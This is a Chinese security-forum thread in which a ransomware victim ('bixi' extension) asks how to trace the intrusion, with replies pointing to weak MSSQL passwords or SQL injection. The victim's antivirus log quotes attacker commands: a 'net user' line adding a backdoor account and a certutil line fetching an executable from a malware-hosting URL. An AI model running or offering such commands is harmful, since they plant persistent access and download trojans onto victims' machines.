首页
社区
课程
招聘
[求助][求助]【被勒索】国庆期间 中了勒索病毒,被黑客搞了几万块!现在又来攻击,求方案
发表于: 2024-10-21 15:25 4006

[求助][求助]【被勒索】国庆期间 中了勒索病毒,被黑客搞了几万块!现在又来攻击,求方案

2024-10-21 15:25
4006

后缀 bixi 解密
被勒索!! 了几万块!

缴纳赎金后 重新装系统了。
现在观察,杀毒软件的日志如下附件

如何找到源头
操作目标:【执行】 C:\Windows\System32\net.exe
操作目标参数:net user k8h3d k8d3j9SjfS7 /ADD


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2024-10-21 15:52 被反勒索学习11编辑 ,原因:
上传的附件:
收藏
免费 0
支持
分享
最新回复 (7)
雪    币: 40
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
2
反勒索每个技术员的正向爱好
2024-10-21 19:11
0
雪    币: 82
活跃值: (604)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
twe
3
感觉是sql 注入漏洞进来的
2024-10-22 15:51
0
雪    币: 2345
活跃值: (3064)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
这不是驱动人生那个勒索的账号密码么
2024-10-22 16:16
0
雪    币: 1264
活跃值: (1179)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
5
mssql 弱口令,自己检查下密码
2024-10-22 16:27
0
雪    币: 1478
活跃值: (1923)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
建议关机
2024-10-23 09:39
0
雪    币: 40
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
7

2024.10.1 1点中毒,勒索信--见--本楼回复的。附件,发邮件给黑客,说3000美元一个ID,


防护项目:数据库

操作目标:【执行】 C:\Windows\System32\certutil.exe

操作目标参数:certutil  -urlcache -split -f http://dl.haqo.net/dll.exe?fr=mssql c:\setupinstalled.exe

操作结果:已阻止

这一条,  这个网站http://dl.haqo.net/dll.exe  杀毒软件 提示是盗号木马, 

最后于 2024-10-23 14:41 被反勒索学习11编辑 ,原因:
上传的附件:
2024-10-23 14:29
0
雪    币: 82
活跃值: (604)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
twe
8
漏洞修补就行了,给你私信了。
2024-10-23 15:53
0
游客
登录 | 注册 方可回帖
返回
//